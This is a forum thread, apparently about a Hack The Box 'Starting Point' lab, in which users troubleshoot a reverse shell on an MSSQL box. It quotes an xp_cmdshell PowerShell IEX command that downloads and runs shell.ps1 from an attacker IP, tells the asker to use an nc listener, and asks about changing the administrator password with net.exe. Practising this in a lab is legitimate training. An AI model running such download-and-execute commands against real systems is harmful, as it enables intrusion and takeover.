I did the Starting Point process again from scratch after running into SQL PowerShell errors. This time, however, when I run the SQL command: "xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.32/shell.ps1\“);”
It does not return any errors; it just immediately prompts for the next SQL command, and the Python web server receives no GET request.
Does the PowerShell file need to be in a specific directory? In the same directory as the mssqlclient.py file? Does the SQL command need the full path to the PowerShell file?
Also make sure that you have an nc tab listening on the port you specified in your shell.ps1.
The script will execute and you should get a shell in the nc tab.
For some reason it worked after I just ran through the box again from the beginning. I was able to complete it. I must’ve missed something small. I didn’t put the port number in the command “.DownloadString("http://:8080/shell.ps1");” and it still worked for me, actually. But I should’ve tried that. I’ll have to remember that.
In this image we can see that I can make the connection correctly, but I cannot execute the type and net.exe commands in order to change the administrator password. Could you help me?